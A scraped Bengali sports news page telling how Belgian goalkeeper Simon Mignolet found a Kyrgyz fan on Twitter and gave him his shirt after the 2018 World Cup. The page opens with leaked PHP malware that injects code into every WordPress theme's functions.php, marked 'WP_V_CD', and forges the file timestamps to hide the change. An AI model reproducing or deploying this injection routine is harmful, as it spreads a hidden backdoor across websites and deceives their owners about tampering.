if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')){ if (strpos($content, 'WP_V_CD') === false){ $content = $install_code . $content ; @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content); touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time ); } else { $ping = false; } } ?>
ভক্তের প্রতি যে ভালোবাসা দেখালেন বেলজিয়ান তারকা – সেরা নিউজ ২৪ ডটকম | SeraNews24.Com | সর্বদা সত্যের সন্ধানে
সংবাদ শিরোনাম :
কবি সাজেদুল হকের ” মাছরাঙার শহরে, উড়ে যাওয়া পাখির দূরে যাওয়া শূন্যতা “ শ্রীপুর উপজেলা পরিষদ নির্বাচনে আলহাজ্ব আব্দুল জলিলকে নৌকার প্রার্থী হিসেবে চায় শ্রীপুরবাসী কুষ্টিয়া তে দুই গ্রুপের সংঘর্ষে নিহত ১ কুমারখালী তে বই উৎসব ২০১৯ অনুষ্ঠিত। কুষ্টিয়া -৪ আসনের আওয়ামীলীগের প্রার্থী সেলিম আলতাফ জর্জ বিশাল ব্যবধানে বিজয়ী। নৌকায় ভোট চাইলেন তিতুমীর কলেজ ছাত্রলীগ নেতা হাসানুর রহমান শাওন কুমারখালী উপজেলা পিএসসি পরীক্ষার ২০১৮ পাশের হার ৯৯.৮.৪% কুমারখালীতে সরকার নির্ধারিত মূল্যে চাল সংগ্রহ কার্যক্রম শুভ উদ্বোধন। কুমারখালী বাসীর কাছে নৌকায় ভোট চাইলেন এমপি আব্দুর রউফ । কুমারখালীর উপজেলা সদকী কাঁঠাল ডাঙ্গী গ্ৰামে আ.লীগের কর্মী সমাবেশ অনুষ্ঠিত।
ভক্তের প্রতি যে ভালোবাসা দেখালেন বেলজিয়ান তারকা

ভক্তের প্রতি যে ভালোবাসা দেখালেন বেলজিয়ান তারকা

স্পোর্টস ডেস্ক::চিরন্তন সত্য একটা কথা হলো- ভক্ত ছাড়া তারকার কোনো মূল্যই নেই। সাধারণ একজনকে তারকায় পরিণত করে ভক্তরাই।

এরপর প্রিয় তারকার কাছে ভক্তেরা তো কত কিছু চায়! কিন্তু চাইলেই পায় কি? কিরগিস্তানের আর্সেনের ভাগ্যে কিন্তু যেন ঈশ্বরের উপহার জুটে গেল!  টুইটারে আর্সেনের খোঁজ চালিয়ে উপহার তুলে দিয়ে গেলেন তার ‘ফুটবলের ঈশ্বর’ সিমোন মিগলোলেট।

রাশিয়া বিশ্বকাপের শেষ ষোলোর মঞ্চে বেলজিয়াম-জাপান ম্যাচ তখন গড়িয়ে গিয়েছে ৯৪ মিনিটে। জাপানের দেওয়া ২ গোল হজম করে সবেমাত্র দলের হয়ে উইনিং গোল করেছেন বেলজিয়ামের নাকার চাডলি। স্কোরবোর্ডে তখন জাপান ২, বেলজিয়াম ৩। দর্শকাসনের বেলজিয়াম-ভক্তেরা আনন্দে আত্মহারা! গ্যালারির দিকে তাকিয়ে নিজেদের উচ্ছ্বাস প্রকাশ করছেন বেলজিয়ামের ফুটবলাররা।

হাজার হাজার ভক্তের মাঝ থেকে হঠাৎই একটি প্ল্যাকার্ড চোখে পড়ে জাপান-বেলজিয়াম ম্যাচের বিকল্প গোলকিপার মিগনোলেটের। ওই প্ল্যাকার্ডে লেখা ছিল কিরঘিস্তান থেকে রাশিয়া বিশ্বকাপ দেখতে আসা এক ভক্তের কাতর প্রার্থনা, মিগনোলেটের টি-শার্টটি তার চাই। সাদা কাগজে মোটা করে কালো কালিতে লেখা, ‘মিগনোলেট, ক্যান আই হ্যাভ ইয়োর টি-শার্ট?’

ম্যাচের পরের দিন সেই দৃশ্যের ক্যামেরাবন্দি ছবি কোনো এক সংবাদপত্রে দেখতে পান মিগনোলেট। তার পরই সেই ছবি টুইটারে পোস্ট করে ছেলেটির খোঁজ চালান এই তারকা।

টুইটারে মিগনোলেটের ফলোয়ারদের এক জন অবশেষে খোঁজ দেন সেই তরুণের। তার সূত্র ধরেই ভক্তের সঙ্গে দেখা করেন বেলজিয়ামের এই গোলকিপার। তুলে দেন ভক্তের কাঙ্ক্ষিত টি-শার্ট। সেই মুহূর্তের ছবিও টুইটারে শেয়ার করেছেন মিগনোলেট।

এর আগেও ভক্তদের নানা আবদার মেটাতে হয়েছে রোনাল্ডো-মেসি-রোনালদিননহো-থিয়েগো সিলভার মতো বিখ্যাত ফুটবলারদের। ব্রাজিলিয়ান তারকা থিয়াগো সিলভাকে বিয়ে করতে চাওয়া অনুরাগিনীকে শান্ত করতে হয়েছিল টি-শার্ট আর একটা আলিঙ্গন দিয়ে। টিম হেটেলের লনে ক্রিশ্চিয়ানো রোনালদোকে দেখে অবাক হয়ে দেখছিল তার খুদে ভক্ত। সিআর সেভেন এগিয়ে গিয়ে তাকে জড়িয়ে ধরলে আচমকাই ভালবাসায় কেঁদে ফেলে সাত নম্বর জার্সিতে সেজে আসা খুদেটি।

এ সব ভক্তির ঝড় সামলাতে হয়েছে লিওনেল মেসিকেও। মাঠের নিরাপত্তারক্ষীদের ফাঁকি দিয়ে প্র্যাকটিস সেশনে মাঠে ঢুকে প্রিয় তারকাকে জড়িয়ে ধরতে চেয়েছেন তারও ভক্ত। হাসিমুখে মিটিয়েছেন সে আবদার। রোনালদিনহো আবার ছিলেন শিশুদের মধ্যে বেশ জনপ্রিয়। হাত মেলানোর অছিলায় তাদের সঙ্গে মেতে ওঠেন তিনি। বিশ্বকাপের কোয়ার্টার ফাইনালে কাজানে ব্রাজিলের সঙ্গে মুখোমুখি হচ্ছে বেলজিয়াম। গ্যালারিতে কি মিগনোলেটের সেই টি-শার্ট পরেই উপস্থিত থাকবেন আর্সেন?

Print Friendly, PDF & Email

সংবাদটি সম্পর্কে আপনার মতামত ‍লিখুন

দয়া করে নিউজটি শেয়ার করুন...

সংবাদ খুজুন

নামাজের সময়সূচী

সেহরীর শেষ সময় - ভোর ৫:১৪
  • ফজর
  • যোহর
  • আছর
  • মাগরিব
  • এশা
  • সূর্যোদয়
  • ভোর ৫:১৯
  • দুপুর ১২:১৬
  • বিকাল ৪:১৬
  • সন্ধ্যা ৫:৫৭
  • রাত ৭:১১
  • ভোর ৬:৩১

ফেসবুক গ্রুপ অনুসরন করুনঃ

বিশ্বকাপ ফুটবল ২০১৮ – World Cup Football 2018 – SeraNews24.com
Facebook Group · 35,396 members
 

Join Group

 

প্রতিমুহূর্তের সংবাদ পেতে ভিজিট করুন “সেরা নিউজ ২৪ ডটকম”
www.SeraNews24.com

 About Us     Contact     Privacy & Policy     DMCA     Sitemap

© সর্বস্বত্ব স্বত্বাধিকার সংরক্ষিত সেরা নিউজ টুয়েন্টিফোর ডটকম -২০১৮